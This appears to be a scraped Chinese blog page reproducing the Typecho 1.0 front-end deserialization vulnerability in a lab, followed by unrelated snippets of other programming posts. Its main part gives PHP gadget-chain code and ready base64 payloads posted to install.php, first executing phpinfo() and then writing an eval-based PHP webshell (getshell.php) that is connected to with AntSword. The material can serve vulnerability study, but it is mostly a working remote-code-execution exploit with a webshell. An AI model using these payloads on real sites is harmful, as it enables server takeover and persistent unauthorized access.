当前位置：首页 > news >正文

typecho反序列化

news 2026/2/10 0:18:35

typecho反序列化

环境的搭建

在这里插入图片描述

漏洞复现前提

<?php
class Typecho_Feed
{const RSS1 = 'RSS 1.0';const RSS2 = 'RSS 2.0';const ATOM1 = 'ATOM 1.0';const DATE_RFC822 = 'r';const DATE_W3CDTF = 'c';const EOL = "\n";private $_type;private $_items;public function __construct() {$this->_type = $this::RSS2;#$this->_type = $this::ATOM1;$this->_items[0] = array('category' => array(new Typecho_Request()),'author' => new Typecho_Request(),);}
}
class Typecho_Request
{private $_params = array();private $_filter = array();public function __construct() {$this->_params['screenName'] = 'phpinfo()'; //此处修改需要执行的代码$this->_filter[0] = 'assert';}
}$exp = array('adapter' => new Typecho_Feed(),'prefix'  => 'typecho_'
);echo base64_encode(serialize($exp));
?>

运行代码会生成相应的base64的payload，以上代码会生成

YToyOntzOjc6ImFkYXB0ZXIiO086MTI6IlR5cGVjaG9fRmVlZCI6Mjp7czoxOToiAFR5cGVjaG9fRmVlZABfdHlwZSI7czo3OiJSU1MgMi4wIjtzOjIwOiIAVHlwZWNob19GZWVkAF9pdGVtcyI7YToxOntpOjA7YToyOntzOjg6ImNhdGVnb3J5IjthOjE6e2k6MDtPOjE1OiJUeXBlY2hvX1JlcXVlc3QiOjI6e3M6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX3BhcmFtcyI7YToxOntzOjEwOiJzY3JlZW5OYW1lIjtzOjk6InBocGluZm8oKSI7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo2OiJhc3NlcnQiO319fXM6NjoiYXV0aG9yIjtPOjE1OiJUeXBlY2hvX1JlcXVlc3QiOjI6e3M6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX3BhcmFtcyI7YToxOntzOjEwOiJzY3JlZW5OYW1lIjtzOjk6InBocGluZm8oKSI7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo2OiJhc3NlcnQiO319fX19czo2OiJwcmVmaXgiO3M6ODoidHlwZWNob18iO30=

在这里插入图片描述

1.执行phpinfo

设置url为:
http://192.168.149.211/typecho_1.0-14.10.10/install.php?finish=

在这里插入图片描述

post data: __typecho_config=YToyOntzOjc6ImFkYXB0ZXIiO086MTI6IlR5cGVjaG9fRmVlZCI6Mjp7czoxOToiAFR5cGVjaG9fRmVlZABfdHlwZSI7czo3OiJSU1MgMi4wIjtzOjIwOiIAVHlwZWNob19GZWVkAF9pdGVtcyI7YToxOntpOjA7YToyOntzOjg6ImNhdGVnb3J5IjthOjE6e2k6MDtPOjE1OiJUeXBlY2hvX1JlcXVlc3QiOjI6e3M6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX3BhcmFtcyI7YToxOntzOjEwOiJzY3JlZW5OYW1lIjtzOjk6InBocGluZm8oKSI7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo2OiJhc3NlcnQiO319fXM6NjoiYXV0aG9yIjtPOjE1OiJUeXBlY2hvX1JlcXVlc3QiOjI6e3M6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX3BhcmFtcyI7YToxOntzOjEwOiJzY3JlZW5OYW1lIjtzOjk6InBocGluZm8oKSI7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo2OiJhc3NlcnQiO319fX19czo2OiJwcmVmaXgiO3M6ODoidHlwZWNob18iO30=

在这里插入图片描述

2. getshell

<?php
class Typecho_Request
{private $_params = array();private $_filter = array();public function __construct(){$this->_params['screenName'] = 'file_put_contents(\'getshell.php\',\'<?php @eval($_POST[123]);?>\')';$this->_filter[0] = 'assert';}
}class Typecho_Feed
{private $_type;private $_items = array();public $dateFormat;public function __construct(){$this->_type = 'ATOM 1.0';$item['author'] = new Typecho_Request();$this->_items[0] = $item;}
}$x = new Typecho_Feed();
$a = array('adapter' => $x,'prefix' => 'typecho_'
);
echo "<pre>";
print_r($a);
echo "</pre>";
echo serialize($a)."<br>";
echo "__typecho_config=".base64_encode(serialize($a));
?>

file_put_contents(\'gethell.php\',\'<?php @eval($_POST[123]);?>\')
使用file_put_contents函数，将一句话木马写入文件，上传到当前目录下

在这里插入图片描述

YToyOntzOjc6ImFkYXB0ZXIiO086MTI6IlR5cGVjaG9fRmVlZCI6Mzp7czoxOToiAFR5cGVjaG9fRmVlZABfdHlwZSI7czo4OiJBVE9NIDEuMCI7czoyMDoiAFR5cGVjaG9fRmVlZABfaXRlbXMiO2E6MTp7aTowO2E6MTp7czo2OiJhdXRob3IiO086MTU6IlR5cGVjaG9fUmVxdWVzdCI6Mjp7czoyNDoiAFR5cGVjaG9fUmVxdWVzdABfcGFyYW1zIjthOjE6e3M6MTA6InNjcmVlbk5hbWUiO3M6NjM6ImZpbGVfcHV0X2NvbnRlbnRzKCdnZXRzaGVsbC5waHAnLCc8P3BocCBAZXZhbCgkX1BPU1RbMTIzXSk7Pz4nKSI7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo2OiJhc3NlcnQiO319fX1zOjEwOiJkYXRlRm9ybWF0IjtOO31zOjY6InByZWZpeCI7czo4OiJ0eXBlY2hvXyI7fQ==

执行：
设置url为:
http://192.168.149.211/typecho_1.0-14.10.10/install.php?finish=

__typecho_config=YToyOntzOjc6ImFkYXB0ZXIiO086MTI6IlR5cGVjaG9fRmVlZCI6Mzp7czoxOToiAFR5cGVjaG9fRmVlZABfdHlwZSI7czo4OiJBVE9NIDEuMCI7czoyMDoiAFR5cGVjaG9fRmVlZABfaXRlbXMiO2E6MTp7aTowO2E6MTp7czo2OiJhdXRob3IiO086MTU6IlR5cGVjaG9fUmVxdWVzdCI6Mjp7czoyNDoiAFR5cGVjaG9fUmVxdWVzdABfcGFyYW1zIjthOjE6e3M6MTA6InNjcmVlbk5hbWUiO3M6NjM6ImZpbGVfcHV0X2NvbnRlbnRzKCdnZXRzaGVsbC5waHAnLCc8P3BocCBAZXZhbCgkX1BPU1RbMTIzXSk7Pz4nKSI7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo2OiJhc3NlcnQiO319fX1zOjEwOiJkYXRlRm9ybWF0IjtOO31zOjY6InByZWZpeCI7czo4OiJ0eXBlY2hvXyI7fQ==

在这里插入图片描述

访问getshell.php页面,shell上传成功

在这里插入图片描述

蚁剑连接
http://192.168.149.211/typecho_1.0-14.10.10/getshell.php

在这里插入图片描述

具体的漏洞分析，可以鉴赏这篇[Typecho前台Getshell漏洞分析]（https://cloud.tencent.com/developer/article/1740471?from_column=20421&from=20421）

typecho反序列化

typecho反序列化环境的搭建漏洞复现前提 <?php class Typecho_Feed {const RSS1 RSS 1.0;const RSS2 RSS 2.0;const ATOM1 ATOM 1.0;const DATE_RFC822 r;const DATE_W3CDTF c;const EOL "\n";private $_type;private $_items;public function __const…...

编程日记 2023/9/13 8:33:45

php程序设计的基本原则

单一职责原则（SRP）：一个类应该只有一个原因引起变化，即一个类应该只负责一项职责。 class User {private $name;private $email;public function __construct($name, $email) {$this->name $name;$this->email $email;}p…...

编程日记 2023/9/13 8:29:40

python execute() 使用%s 拼接sql 避免sql注入攻击好于.format

1 execute(参数一:sql 语句) # 锁定当前查询结果行 cursor.execute("SELECT high, low, vol FROM table_name WHERE symbol %s FOR UPDATE;"% (symbol,)) 2 .format() cursor.execute("SELECT high, low, vol FROM table_name WHERE symbol {} FOR UPDATE;…...

编程日记 2023/9/13 8:27:36

RPC项目解析（1）

分布式通信框架：让远程方法调用和调用进程内方法一样简单 RPC通信原理 rpc：远程过程调用（远程能够调用其他模块的方法） 在rpc中需要发送时候，对发送的信息进行序列化，在服务端对接收到的信息进行反序列化…...

编程日记 2023/9/13 8:26:34

点云从入门到精通技术详解100篇-基于 RGB 图像与点云融合的三维点云分割算法及成像系统

目录前言相机和激光雷达标定研究现状点云分割算法研究现状...

编程日记 2023/9/13 8:25:33

JDK8新特性

Lembda表达式 lembda表达式是一个简洁、可传递的匿名函数,实现了把代码块赋值给一个变量的功能是我认为jdk1.8中最让人眼前一亮的特性（我没用过其他函数式的语言） 在了解表达式之前，我们先看两个概念函数式接口含有且仅含有一个抽象方法&…...

编程日记 2023/9/13 8:23:31

X86_64函数调用汇编程序分（2）

X86_64函数调用汇编程序分（2） 1 X86_64寄存器使用标准2 leaveq和retq指令2.1 leaveq2.2 retq 3 执行leaveq和retq之后栈的结构3.1 执行leaveq之后栈的结构3.1.1 test_fun_b函数执行leaveq之前的栈结构示意图3.1.2 test_fun_b函数执行leaveq之后的栈结构示…...

编程日记 2023/9/13 8:22:31

组件传值之ref（解决父传子动态绑定问题）

在父组件往子组件传值，子组件中要显示父组件的信息，首先是在网上搜的watch 来监听组组件的props,但是父组件只传一次，后续再更改就没了，所以我用的$refs props:{params:{type:Object;defult():{return {} } } }watch:{params: {/…...

编程日记 2023/9/13 8:18:27

vscode-server

1know_host清除 2 删除服务器里的home/user/.vscode-server（不是根root下的vscode-server），删除时用户名保持一致。 3 ssh配置文件 /etc/ssh/sshd_config[想改变,使用root，修改文件权限] 4 删除修改后，重启Windows下…...

编程日记 2023/9/13 8:17:26

ubuntu 20.04安装开发环境总结_安装python

Ubuntu 20.04 是一款主要面向开发人员的操作系统之一，与此同时，它还支持多种开发环境和工具的使用。但是因为对市面上各种软件的支持没有window那样友好，所以对ubuntu系统安装配置各种环境的问题做了个总结安装 PyCharm： 可以从…...

编程日记 2023/9/13 8:16:25

尚硅谷_宋红康_IntelliJ IDEA 常用快捷键一览表

1-IDEA的日常快捷键第1组：通用型说明快捷键复制代码-copyctrl c粘贴-pastectrl v剪切-cutctrl x撤销-undoctrl z反撤销-redoctrl shift z保存-save allctrl s全选-select allctrl a 第2组：提高编写速度（上） 说明快捷…...

编程日记 2023/9/13 8:15:24

Java设计模式之建造者模式详解（Builder Pattern）

在日常的开发工作中，我们常常需要创建一些复杂的对象。这些对象可能包含许多不同的属性，并且这些属性的初始化过程可能相当复杂。在这种情况下，建造者模式是一种非常有用的设计模式，因为它允许我们分步骤地创建复杂的对象。概念和…...

编程日记 2023/9/13 8:11:20

TCP的滑动窗口与拥塞控制

客户端每发送的一个包，服务器端都应该有个回复，如果服务器端超过一定的时间没有回复，客户端就会重新发送这个包，直到有回复。为了保证顺序性，每一个包都有一个 ID。在建立连接的时候，会商定起始的 ID 是什…...

编程日记 2023/9/13 8:10:19

MySQL更新语句执行过程

执行流程 update t set name XXX where id 1; 加载id1的记录所在的整页数据到缓存池；旧值写入undolog便于回滚；更新内存数据；写redo log到RedoBuff；redo log顺序写入磁盘，准备提交事务（prepare阶段&…...

编程日记 2023/9/13 8:07:16

Matlab图像处理-彩色图像基础

彩色的物理认识人类能够感知的物体的颜色是由物体反射的光的性质决定的。如图8-2所示，可见光是由电磁波谱中较窄的波段组成。如果物体反射的光在所有可见光波长范围内都是平衡的，那么从观察者的角度来看，它是白色的； 如果物体…...

编程日记 2023/9/13 8:05:14

MATLAB算法实战应用案例精讲-【数模应用】数据中台

目录前言几个高频面试题目数据中台、数仓、大数据平台的区别 1）数据中台VS数据仓库...

编程日记 2023/9/13 8:02:12

el-form动态检验无法生效问题（已解决）

要对el-form里面的字段动态生成校验规则，测试了一系列的骚操作也无法生效，要么是require视图生效了，校验规则还是不生效;看了csdn里面好多方案，都是废话，废话，直接上硬货，最终总结如下&#xff…...

编程日记 2023/9/13 8:01:10

【python】代码学习过程问题总结

目录 1. 使用 conda 创建并进入虚拟环境 2. pycharm 选择 interpreter 的时候，在虚拟环境中找不到 python.exe 3.（py & python）ModuleNotFoundError: No module named XXX 4. AttributeError: module ‘tensorflow‘ has no attribu…...

编程日记 2023/9/13 7:57:07

Qt应用开发(基础篇)——菜单 QMenu

一、前言 QMenu类继承于QWidget，它提供了一个菜单样式的小部件，用于菜单栏、上下文菜单和一些弹出式菜单。 QMenu菜单的选项是可选的，它可以是一个下拉的菜单，也可以是独立的上下文菜单。下拉菜单通常作用于当用户单击相应的项目或…...

编程日记 2023/9/13 7:56:06

MySQL-DDL语句

MySQL-DDL语句数据库操作语句增删数据库查看数据库列表创建数据库进入（使用）数据库/查看当前所在的数据库查看数据库的建库语句查看数据库的编码集和校验集删除数据库修改数据库的编码集查看数据库支持的编码集和校验集数据库备份备份单个数据库恢复数…...

编程日记 2023/9/13 7:55:05

多模态2025：技术路线“神仙打架”，视频生成冲上云霄

文｜魏琳华编｜王一粟一场大会，聚集了中国多模态大模型的“半壁江山”。智源大会2025为期两天的论坛中，汇集了学界、创业公司和大厂等三方的热门选手，关于多模态的集中讨论达到了前所未有的热度。其中，…...

编程新知 2026/2/8 20:43:00

循环冗余码校验CRC码算法步骤+详细实例计算

通信过程：（白话解释） 我们将原始待发送的消息称为 M M M，依据发送接收消息双方约定的生成多项式 G ( x ) G(x) G(x)（意思就是 G （ x ) G（x) G（x) 是已知的）&#xff0…...

编程新知 2026/2/9 21:57:29

使用分级同态加密防御梯度泄漏

抽象联邦学习 （FL） 支持跨分布式客户端进行协作模型训练，而无需共享原始数据，这使其成为在互联和自动驾驶汽车 （CAV） 等领域保护隐私的机器学习的一种很有前途的方法。然而，最近的研究表明&…...

编程新知 2026/1/24 6:22:43

基于Docker Compose部署Java微服务项目

一. 创建根项目根项目（父项目）主要用于依赖管理一些需要注意的点： 打包方式需要为 pom<modules>里需要注册子模块不要引入maven的打包插件，否则打包时会出问题 <?xml version"1.0" encoding"UTF-8…...

编程新知 2026/2/5 3:09:56

GitFlow 工作模式（详解）

今天再学项目的过程中遇到使用gitflow模式管理代码，因此进行学习并且发布关于gitflow的一些思考 Git与GitFlow模式我们在写代码的时候通常会进行网上保存，无论是github还是gittee，都是一种基于git去保存代码的形式，这样保存代码…...

编程新知 2026/1/26 12:37:40

Python+ZeroMQ实战：智能车辆状态监控与模拟模式自动切换

目录关键点技术实现1 技术实现2 摘要： 本文将介绍如何利用Python和ZeroMQ消息队列构建一个智能车辆状态监控系统。系统能够根据时间策略自动切换驾驶模式（自动驾驶、人工驾驶、远程驾驶、主动安全），并通过实时消息推送更新车…...

编程新知 2025/11/12 0:06:50

在 Spring Boot 中使用 JSP

jsp？ 好多年没用了。重新整一下还费了点时间，记录一下。项目结构： pom: <?xml version"1.0" encoding"UTF-8"?> <project xmlns"http://maven.apache.org/POM/4.0.0" xmlns:xsi"http://ww…...

编程新知 2026/2/4 11:39:13